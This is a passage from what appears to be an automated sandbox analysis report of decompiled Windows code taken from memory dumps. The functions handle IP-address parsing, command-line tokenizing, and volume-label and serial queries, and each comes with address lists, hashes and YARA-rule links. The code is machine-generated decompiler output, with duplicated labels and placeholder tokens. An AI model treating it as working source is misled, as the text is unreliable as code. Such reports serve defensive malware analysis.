						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E022A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0229DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E022D0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E022D0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E022D06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E022D06BA(_t135, _t178) == 0 || E022D0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E022D0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E022D0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E022D06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E022D06BA(_t124, _t142) == 0 || E022D0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                0x022d0b21
                                0x022d0b24
                                0x022d0b27
                                0x022d0b2a
                                0x022d0b2d
                                0x022d0b30
                                0x022d0b33
                                0x022d0b36
                                0x022d0b39
                                0x022d0b3e
                                0x022d0c65
                                0x022d0c68
                                0x022d0c6a
                                0x022d0c6f
                                0x022feb42
                                0x00000000
                                0x00000000
                                0x022feb48
                                0x022feb48
                                0x022d0c75
                                0x022d0c7a
                                0x022feb54
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022feb5a
                                0x022d0c80
                                0x022d0c84
                                0x022feb98
                                0x00000000
                                0x00000000
                                0x022feba6
                                0x022d0cb8
                                0x022d0cba
                                0x022d0cd3
                                0x022d0cda
                                0x022d0ce4
                                0x022d0ce9
                                0x00000000
                                0x022d0cec
                                0x022d0c8c
                                0x022feb63
                                0x00000000
                                0x00000000
                                0x022feb70
                                0x022feb75
                                0x022feb7d
                                0x00000000
                                0x00000000
                                0x022feb8c
                                0x00000000
                                0x022feb8c
                                0x022d0c96
                                0x00000000
                                0x00000000
                                0x022d0ca2
                                0x022d0cac
                                0x022d0cb4
                                0x00000000
                                0x00000000
                                0x022d0b44
                                0x022d0b47
                                0x022d0b49
                                0x00000000
                                0x00000000
                                0x022d0b4f
                                0x022d0b50
                                0x00000000
                                0x00000000
                                0x022d0b56
                                0x022d0b62
                                0x022d0b7c
                                0x022d0bac
                                0x022d0a0f
                                0x022feaaa
                                0x00000000
                                0x022feac4
                                0x022feac4
                                0x022d0bd0
                                0x022d0bd0
                                0x022d0bd4
                                0x022d0bd9
                                0x00000000
                                0x00000000
                                0x022d0bdb
                                0x022d0be0
                                0x022feb0e
                                0x022d0a1a
                                0x00000000
                                0x022d0a1a
                                0x022feb1a
                                0x022feb1f
                                0x022feb27
                                0x00000000
                                0x00000000
                                0x022feb36
                                0x00000000
                                0x022feb36
                                0x022d0bea
                                0x00000000
                                0x00000000
                                0x022d0bf6
                                0x022d0c00
                                0x022d0c03
                                0x022d0c0b
                                0x00000000
                                0x022d0c0b
                                0x022feaaa
                                0x00000000
                                0x022d0a15
                                0x022d0bb6
                                0x00000000
                                0x022d0bc6
                                0x022d0bc6
                                0x022d0bcb
                                0x022d0c15
                                0x00000000
                                0x00000000
                                0x022d0c1d
                                0x022d0c20
                                0x022d0c21
                                0x022d0c24
                                0x022d0c24
                                0x022d0c26
                                0x00000000
                                0x022d0c26
                                0x022d0bcd
                                0x00000000
                                0x022d0bcd
                                0x022d0b89
                                0x022d0b89
                                0x022d0b90
                                0x00000000
                                0x00000000
                                0x022d0b96
                                0x00000000
                                0x022d0b96
                                0x022d0a04
                                0x022d0a04
                                0x022d0b9a
                                0x022d0b9a
                                0x022d0b9b
                                0x022d0b9f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022d0ba5
                                0x022d0ac7
                                0x022d0aca
                                0x022feacf
                                0x00000000
                                0x022feade
                                0x022feade
                                0x022feae3
                                0x00000000
                                0x00000000
                                0x022feaf3
                                0x022feaf6
                                0x022feaf7
                                0x022feafe
                                0x022feb01
                                0x00000000
                                0x022feb01
                                0x022feacf
                                0x022d0ad0
                                0x022d0ad4
                                0x00000000
                                0x00000000
                                0x022d0ada
                                0x022d0ae6
                                0x022d0c34
                                0x00000000
                                0x022d0c47
                                0x022d0c49
                                0x022d0c4a
                                0x022d0c4e
                                0x022d0c51
                                0x022d0c54
                                0x022d0c57
                                0x022d0c5a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022d0c60
                                0x022d0afb
                                0x022d0afe
                                0x022d0b02
                                0x022d0b05
                                0x022d0b08
                                0x00000000
                                0x022d0b08
                                0x022d0ae6
                                0x022d0b44
                                0x022d09f8
                                0x022d09f8
                                0x022d09f9
                                0x00000000
                                0x00000000
                                0x022feaa0
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: __fassign
                                • String ID: .$:$:
                                • API String ID: 3965848254-2308638275
                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                • Instruction ID: d5cbe76bade1ba5442e6cd11d3a53d3c67b1973da37a32600e3a3d6aa57f53bf
                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                • Instruction Fuzzy Hash: 77A18D71D2434ADECB24CFE4C8446EEB7B5AF45308F24886AD842A72A8D7749B45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551D26, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 204COMMON
                                Download Yara Rule
                                C-Code - Quality: 97%
                                			E4A551D26(signed int __eax, long* _a4, intOrPtr _a8, signed int _a12) {
				long _v8;
				signed short* _v12;
				void* __ecx;
				signed int _t42;
				signed int _t43;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t55;
				long _t67;
				signed short _t71;
				void* _t75;
				void* _t81;
				signed int _t89;
				signed int _t97;
				long _t98;
				long _t99;
				long _t100;
				long* _t103;
				long* _t105;
				long* _t107;

				_t42 = __eax;
				_push(_t82);
				_push(0);
				_push(0x4a574ac0);
				L4A551BC7();
				if(__eax != 0) {
					L43:
					_t43 = _t42 | 0xffffffff;
					L17:
					return _t43;
				}
				_t103 = _a4;
				if(_t103 == 0) {
					if( *0x4a590658 != 0) {
						E4A5558F3(L"Ungetting: \'%s\'\n",  *0x4a574190);
					}
					_t45 =  *0x4a574190; // 0x0
					 *0x4a574194 = _t45;
					_t43 = 0;
					goto L17;
				}
				if(_a8 < 6) {
					goto L43;
				}
				_t46 =  *0x4a574194; // 0x0
				 *0x4a574190 = _t46;
				_v12 = _t103;
				if((_a12 & 0x00000021) != 0) {
					L10:
					if(E4A551F90( &_v8,  &_a12) != 0x100) {
						_a12 = _a12 | 0x00000040;
						 *_t103 = _v8;
						 *0x4a574198 =  *0x4a574198 & 0x00000000;
						_t105 =  &(_t103[0]);
						_t97 = _t105 - _v12 >> 1;
						while(1) {
							_a4 = _t105;
							if(E4A551F90( &_v8,  &_a12) == 0x100 || _t97 >= _a8 - 1) {
								break;
							}
							 *_t105 = _v8;
							_t105 =  &(_t105[0]);
							_t97 = _t97 + 1;
						}
						_a12 = _a12 & 0xffffffbf;
						 *_t105 = 0;
						_t55 = _a8;
						_t28 = _t55 - 1; // 0x5
						_t87 = _t28;
						if(_t97 < _t28) {
							_t55 = E4A551F77(_t55);
						}
						if(_t97 >= _t55) {
							if(_v8 == 0xffff) {
								goto L25;
							}
							_t42 = E4A556D44(_t87, 0x234f, 1, _v12);
							goto L43;
						} else {
							L25:
							_t43 = 0x4000;
							goto L17;
						}
					}
					_t98 = _v8;
					_t81 = 2;
					 *_t103 = _t98;
					_t107 =  &(_t103[0x40]);
					_a4 = _t107;
					if(iswdigit(_t98) != 0) {
						_t98 = E4A551E26() & 0x0000ffff;
						 *_t107 = _t98;
						_t107 =  &(_t107[0x40]);
						_v8 = _t98;
						_a4 = _t107;
					}
					if(_t98 == 0x7c || _t98 == 0x26 || _t98 == 0x3e || _t98 == 0x3c) {
						_t63 = E4A551E26() & 0x0000ffff;
						_v8 = _t63;
						_t30 = _t107 - 2; // 0x0
						if(_t63 ==  *_t30) {
							 *_t107 = _t63;
							_t107 = _t107 + _t81;
							_a4 = _t107;
							_t63 = E4A551E26() & 0x0000ffff;
							_v8 = _t63;
						}
						_t33 = _t107 - 2; // 0x0
						_t89 =  *_t33 & 0x0000ffff;
						if(_t89 != 0x3e) {
							if(_t89 != 0x3c) {
								goto L32;
							}
							goto L31;
						} else {
							L31:
							if(_t63 == 0x26) {
								_t67 = 0x26;
								 *_t107 = _t67;
								_t107 = _t107 + _t81;
								_a4 = _t107;
								do {
									_t99 = E4A551E26() & 0x0000ffff;
									_v8 = _t99;
								} while (iswspace(_t99) != 0 || E4A5518EB(?str?, _t99) != 0);
								if(iswdigit(_t99) != 0) {
									 *_t107 = _t99;
									_t107 = _t107 + _t81;
									_a4 = _t107;
									_t71 = E4A551E26();
									_t63 = _t71 & 0x0000ffff;
									_v8 = _t71 & 0x0000ffff;
								}
							}
							L32:
							E4A551F77(_t63);
							goto L16;
						}
					} else {
						L16:
						 *_t107 = 0;
						_t43 =  *_v12 & 0x0000ffff;
						goto L17;
					}
				} else {
					goto L4;
				}
				while(1) {
					L4:
					_t100 = E4A551E26() & 0x0000ffff;
					_v8 = _t100;
					if(iswspace(_t100) != 0 && _t100 != 0xa) {
						goto L6;
					} else {
						continue;
					}
					do {
						L4:
						_t100 = E4A551E26() & 0x0000ffff;
						_v8 = _t100;
					} while (iswspace(_t100) != 0 && _t100 != 0xa);
					L6:
					_t75 = 0x4a574672;
					if((_a12 & 0x00000004) == 0) {
						_t75 = 0x4a574670;
					}
					if(E4A5518EB(_t75, _t100) != 0) {
						if(_t100 == 0) {
							goto L9;
						}
						continue;
					} else {
						L9:
						E4A551F77(_t76);
						goto L10;
					}
				}
			}























                                0x4a551d26
                                0x4a551d2c
                                0x4a551d30
                                0x4a551d32
                                0x4a551d37
                                0x4a551d40
                                0x4a556804
                                0x4a556804
                                0x4a551e1a
                                0x4a551e1e
                                0x4a551e1e
                                0x4a551d46
                                0x4a551d4b
                                0x4a552af1
                                0x4a566fd2
                                0x4a566fd8
                                0x4a552af7
                                0x4a552afc
                                0x4a552b01
                                0x00000000
                                0x4a552b01
                                0x4a551d55
                                0x00000000
                                0x00000000
                                0x4a551d5f
                                0x4a551d64
                                0x4a551d69
                                0x4a551d6c
                                0x4a551daf
                                0x4a551dc3
                                0x4a5527fe
                                0x4a552802
                                0x4a552805
                                0x4a55280d
                                0x4a552813
                                0x4a552815
                                0x4a55281d
                                0x4a552827
                                0x00000000
                                0x00000000
                                0x4a552835
                                0x4a552839
                                0x4a55283a
                                0x4a55283a
                                0x4a55283d
                                0x4a552843
                                0x4a552846
                                0x4a552849
                                0x4a552849
                                0x4a55284e
                                0x4a552850
                                0x4a552850
                                0x4a552857
                                0x4a566fe7
                                0x00000000
                                0x00000000
                                0x4a566ff7
                                0x00000000
                                0x4a55285d
                                0x4a55285d
                                0x4a55285d
                                0x00000000
                                0x4a55285d
                                0x4a552857
                                0x4a551dc9
                                0x4a551dce
                                0x4a551dcf
                                0x4a551dd2
                                0x4a551dd5
                                0x4a551de1
                                0x4a554acc
                                0x4a554acf
                                0x4a554ad2
                                0x4a554ad4
                                0x4a554ad7
                                0x4a554ad7
                                0x4a551deb
                                0x4a553dbc
                                0x4a553dbf
                                0x4a553dc2
                                0x4a553dc6
                                0x4a553dc8
                                0x4a553dcb
                                0x4a553dcd
                                0x4a553dd5
                                0x4a553dd8
                                0x4a553dd8
                                0x4a553ddb
                                0x4a553ddb
                                0x4a553de3
                                0x4a5567f9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a553de9
                                0x4a553de9
                                0x4a553ded
                                0x4a556371
                                0x4a556372
                                0x4a556375
                                0x4a556377
                                0x4a55637a
                                0x4a55637f
                                0x4a556383
                                0x4a55638d
                                0x4a5563aa
                                0x4a5563b0
                                0x4a5563b3
                                0x4a5563b5
                                0x4a5563b8
                                0x4a5563bd
                                0x4a5563c0
                                0x4a5563c0
                                0x4a5563aa
                                0x4a553df3
                                0x4a553df3
                                0x00000000
                                0x4a553df3
                                0x4a551e0f
                                0x4a551e0f
                                0x4a551e11
                                0x4a551e17
                                0x00000000
                                0x4a551e17
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a551d6e
                                0x4a551d6e
                                0x4a551d73
                                0x4a551d77
                                0x4a551d83
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a551d6e
                                0x4a551d6e
                                0x4a551d73
                                0x4a551d77
                                0x4a551d81
                                0x4a551d8b
                                0x4a551d8f
                                0x4a551d94
                                0x4a551d96
                                0x4a551d96
                                0x4a551da4
                                0x4a5557e4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a551daa
                                0x4a551daa
                                0x4a551daa
                                0x00000000
                                0x4a551daa
                                0x4a551da4

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _setjmp3iswdigitiswspace
                                • String ID: =,;$Ungetting: '%s'
                                • API String ID: 3355992209-942940122
                                • Opcode ID: 4b19b3861a06920abcf155e84b0c55f8d9556831ec31f3a0f6ed311200473c78
                                • Instruction ID: cf95c47f79dfb2677f38d224200587f5412e2b741d0b226911d5cf20ec10e774
                                • Opcode Fuzzy Hash: 4b19b3861a06920abcf155e84b0c55f8d9556831ec31f3a0f6ed311200473c78
                                • Instruction Fuzzy Hash: 65610475902286EBDB21BFA5CB406AD7FF4BF45368F11051BE844DB24CE7748A81CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56E53B, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E4A56E53B(void* __edx, signed short _a4) {
				signed int _v8;
				intOrPtr _v12;
				short _v16;
				char _v272;
				short _v786;
				long _v800;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				short _t19;
				intOrPtr _t20;
				signed short _t21;
				void* _t28;
				int _t30;
				long _t31;
				signed short _t32;
				long _t51;
				void* _t55;
				void* _t58;
				void* _t60;
				void* _t63;
				long _t64;
				signed int _t66;

				_t63 = __edx;
				_t17 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t17 ^ _t66;
				_t19 =  *0x4a56e6d0; // 0x3a0020
				_t65 = _a4;
				_t64 =  *_t65 & 0x0000ffff;
				_v16 = _t19;
				_t20 =  *0x4a56e6d4; // 0x5c
				_v12 = _t20;
				if(_t64 != 0) {
					_t21 = _t65;
					_t63 = _t21 + 2;
					do {
						_t55 =  *_t21;
						_t21 = _t21 + 2;
					} while (_t55 != 0);
					if(_t21 - _t63 >> 1 != 2 ||  *((short*)(_t65 + 2)) != 0x3a) {
						L17:
						E4A5558F3();
						E4A556D44(_t55, 0xf, 0, 0x4a5745a8);
						goto L18;
					} else {
						_t30 = iswalpha(_t64);
						_pop(_t55);
						if(_t30 == 0) {
							goto L17;
						} else {
							_t31 =  *_t65 & 0x0000ffff;
							goto L8;
						}
					}
				} else {
					_t31 =  *0x4a575260 & 0x0000ffff;
					L8:
					_t32 = towupper(_t31);
					_pop(_t58);
					_t65 = _t32 & 0x0000ffff;
					_v16 = _t32 & 0x0000ffff;
					if(GetVolumeInformationW( &_v16,  &_v786, 0x101,  &_v800, 0, 0, 0, 0) != 0) {
						if(_v786 == 0) {
							E4A5599E1(_t58, 0x235e, 1, E4A559A2C(0x4a56e6c8, _t65 & 0x0000ffff));
						} else {
							_push( &_v786);
							E4A5599E1(_t58, 0x235f, 2, E4A559A2C(0x4a56e6c8, _t65 & 0x0000ffff));
						}
						_push(_v800 & 0x0000ffff);
						E4A55179D( &_v272, 0x80, L"%04X-%04X", _v800 >> 0x10);
						E4A5599E1(_v800 & 0x0000ffff, 0x235b, 1,  &_v272);
						_t28 = 0;
					} else {
						E4A5558F3();
						_t65 = GetLastError;
						_t60 = 0x4a5745a8;
						_t51 = GetLastError();
						_push(0);
						if(_t51 != 0x15) {
							_push(GetLastError());
						} else {
							_push(_t51);
						}
						E4A556D44(_t60);
						L18:
						_t28 = 1;
					}
				}
				return E4A5513A9(_t28, 0, _v8 ^ _t66, _t63, _t64, _t65);
			}



























                                0x4a56e53b
                                0x4a56e546
                                0x4a56e54d
                                0x4a56e550
                                0x4a56e557
                                0x4a56e55b
                                0x4a56e55e
                                0x4a56e561
                                0x4a56e568
                                0x4a56e56e
                                0x4a56e579
                                0x4a56e57b
                                0x4a56e57e
                                0x4a56e57e
                                0x4a56e582
                                0x4a56e583
                                0x4a56e58f
                                0x4a56e69e
                                0x4a56e6a3
                                0x4a56e6ab
                                0x00000000
                                0x4a56e5a0
                                0x4a56e5a1
                                0x4a56e5a7
                                0x4a56e5aa
                                0x00000000
                                0x4a56e5b0
                                0x4a56e5b0
                                0x00000000
                                0x4a56e5b0
                                0x4a56e5aa
                                0x4a56e570
                                0x4a56e570
                                0x4a56e5b3
                                0x4a56e5b4
                                0x4a56e5ba
                                0x4a56e5be
                                0x4a56e5d9
                                0x4a56e5e5
                                0x4a56e619
                                0x4a56e658
                                0x4a56e61b
                                0x4a56e621
                                0x4a56e638
                                0x4a56e63d
                                0x4a56e669
                                0x4a56e67f
                                0x4a56e692
                                0x4a56e69a
                                0x4a56e5e7
                                0x4a56e5ec
                                0x4a56e5f1
                                0x4a56e5f7
                                0x4a56e5f8
                                0x4a56e5fa
                                0x4a56e5fe
                                0x4a56e605
                                0x4a56e600
                                0x4a56e600
                                0x4a56e600
                                0x4a56e606
                                0x4a56e6b3
                                0x4a56e6b5
                                0x4a56e6b5
                                0x4a56e5e5
                                0x4a56e6c4

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                • String ID: :\$%04X-%04X
                                • API String ID: 930873262-3541097225
                                • Opcode ID: 71eefef3591e94b028188db2489ccb08148485ed6c46cf554c64f4a36f6c3943
                                • Instruction ID: dd22fc45a7537bdacb182f00b2106bc581c0f7c208fcef8b00d9fc032b03bfdd
                                • Opcode Fuzzy Hash: 71eefef3591e94b028188db2489ccb08148485ed6c46cf554c64f4a36f6c3943
                                • Instruction Fuzzy Hash: DB412AB1912115BBE720ABA4DF45EBE7BBCEB49300F404457F909EA085EA749E408B70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556C46, Relevance: 12.4, APIs: 8, Instructions: 353COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E4A556C46(signed int __ebx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t169;
				signed int _t170;
				signed int _t173;
				WCHAR* _t174;
				long _t188;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t206;
				void* _t229;
				void* _t248;
				void* _t252;
				short* _t253;
				signed int _t256;
				signed int _t260;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t294;
				signed int _t321;
				signed int _t332;
				signed int _t336;
				WCHAR* _t339;
				void* _t340;
				void* _t341;
				WCHAR* _t342;
				signed int _t348;
				void* _t350;
				signed int _t357;
				signed int _t360;
				wchar_t* _t365;
				signed int _t367;
				void* _t369;

				L0:
				while(1) {
					L0:
					_t348 = __esi;
					_t334 = __edx;
					_t288 = __ebx;
					_t339 = E4A5519D6(__edi + 2);
					if(_t339 == 0) {
						goto L80;
					} else {
						__eax = E4A552ED1(__edi);
						__eflags =  *__eax - 0x22;
						if( *__eax == 0x22) {
							__ecx = 0;
							 *__eax = __cx;
						}
						break;
					}
					while(1) {
						L80:
						__eflags =  *(_t367 - 0x830);
						if( *(_t367 - 0x830) != 0) {
							goto L83;
						} else {
							break;
						}
						while(1) {
							L83:
							__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
							while(1) {
								L73:
								 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
								while(1) {
									L18:
									_t348 = _t348 + 2;
									_t169 =  *_t348 & 0x0000ffff;
									__eflags = _t169;
									if(_t169 == 0) {
										break;
									}
									L8:
									__eflags = _t169 - 0x24;
									if(_t169 == 0x24) {
										break;
									}
									L9:
									_t271 =  *_t339(L"fdpnxsatz",  *_t288(_t169) & 0x0000ffff);
									_t369 = _t369 + 0xc;
									__eflags = _t271;
									if(_t271 == 0) {
										break;
									}
									L10:
									_t273 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
									__eflags = _t273;
									if(_t273 != 0) {
										 *(_t367 - 0x848) = _t348;
										 *(_t367 - 0x834) =  *(_t367 - 0x828);
									}
									_t277 =  *_t288( *_t348 & 0x0000ffff) & 0x0000ffff;
									__eflags = _t277 - 0x70;
									_pop(_t294);
									if(__eflags > 0) {
										L59:
										_t278 = _t277 - 0x73;
										__eflags = _t278;
										if(_t278 == 0) {
											L77:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008020;
											continue;
										}
										L60:
										_t279 = _t278 - 1;
										__eflags = _t279;
										if(_t279 == 0) {
											L76:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004200;
											continue;
										}
										L61:
										_t280 = _t279 - 4;
										__eflags = _t280;
										if(_t280 != 0) {
											L74:
											__eflags = _t280 != 0;
											if(_t280 != 0) {
												goto L67;
											}
											L75:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004400;
											continue;
										}
										L62:
										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008010;
										continue;
									} else {
										L12:
										if(__eflags == 0) {
											L57:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008004;
											continue;
										}
										L13:
										_t283 = _t277 - 0x61;
										__eflags = _t283;
										if(_t283 == 0) {
											L73:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
											continue;
										}
										L14:
										_t284 = _t283 - 3;
										__eflags = _t284;
										if(_t284 == 0) {
											L56:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008002;
											continue;
										}
										L15:
										_t286 = _t284;
										__eflags = _t286;
										if(_t286 == 0) {
											L65:
											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
											continue;
										}
										L16:
										__eflags = _t286 != 8;
										if(_t286 != 8) {
											L67:
											__eflags =  *(_t367 - 0x830);
											if( *(_t367 - 0x830) == 0) {
												L69:
												_t174 = 0;
												L3:
												_pop(_t340);
												_pop(_t350);
												_pop(_t289);
												return E4A5513A9(_t174, _t289,  *(_t367 - 4) ^ _t367, _t334, _t340, _t350);
											}
											L68:
											E4A556D44(_t294, 0x400023a8, 1,  *((intOrPtr*)(_t367 - 0x844)));
											_t369 = _t369 + 0xc;
											L83:
											__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
											goto L73;
										} else {
											_t4 = _t367 - 0x828;
											 *_t4 =  *(_t367 - 0x828) | 0x00008008;
											__eflags =  *_t4;
											continue;
										}
									}
								}
								L19:
								_t170 =  *_t348 & 0x0000ffff;
								 *(_t367 - 0x838) =  *(_t367 - 0x838) & 0x00000000;
								__eflags = _t170;
								if(_t170 == 0) {
									L63:
									_t348 =  *(_t367 - 0x848);
									 *(_t367 - 0x828) =  *(_t367 - 0x834);
									L22:
									_t173 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
									_pop(_t294);
									__eflags = _t173;
									if(_t173 == 0) {
										goto L67;
									}
									L23:
									_t339 =  *( *(_t367 - 0x83c) + (_t173 -  *((intOrPtr*)(_t367 - 0x840)) >> 1) * 4);
									__eflags = _t339;
									if(_t339 == 0) {
										goto L26;
									}
									L24:
									__eflags =  *_t339 - 0x22;
									if( *_t339 == 0x22) {
										goto L0;
									}
									L25:
									__eflags =  *_t348 - 0x30;
									if( *_t348 == 0x30) {
										_t260 =  *0x4a5740b4; // 0x0
										__eflags = _t260;
										if(_t260 != 0) {
											__eflags =  *((intOrPtr*)(_t260 + 0x8c)) - _t339;
											if( *((intOrPtr*)(_t260 + 0x8c)) == _t339) {
												__eflags =  *(_t367 - 0x838);
												if( *(_t367 - 0x838) == 0) {
													__eflags =  *(_t367 - 0x828) & 0x0000c000;
													if(( *(_t367 - 0x828) & 0x0000c000) != 0) {
														_t339 =  *_t260;
													}
												}
											}
										}
									}
									goto L26;
								}
								L20:
								__eflags = _t170 - 0x24;
								if(_t170 == 0x24) {
									L78:
									_t365 = _t348 + 2;
									 *(_t367 - 0x834) = _t365;
									_t348 = wcschr(_t365, 0x3a);
									_pop(_t294);
									__eflags = _t348;
									if(_t348 == 0) {
										goto L67;
									}
									L79:
									_t339 = (_t348 -  *(_t367 - 0x834) >> 1) + 1;
									_t288 = E4A551896(_t339 + _t339);
									__eflags = _t288;
									if(_t288 != 0) {
										L84:
										E4A554B3D(_t288, _t339,  *(_t367 - 0x834), _t339 - 1);
										 *(_t367 - 0x838) = E4A55321B(_t294, _t288);
										E4A55142E(_t288);
										__eflags =  *(_t367 - 0x838);
										if( *(_t367 - 0x838) == 0) {
											_t113 = _t367 - 0x838;
											 *_t113 =  *(_t367 - 0x838) | 0xffffffff;
											__eflags =  *_t113;
										}
										_t339 = wcsrchr;
										_t348 = _t348 + 2;
										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008000;
										goto L22;
									}
									goto L80;
								}
								L21:
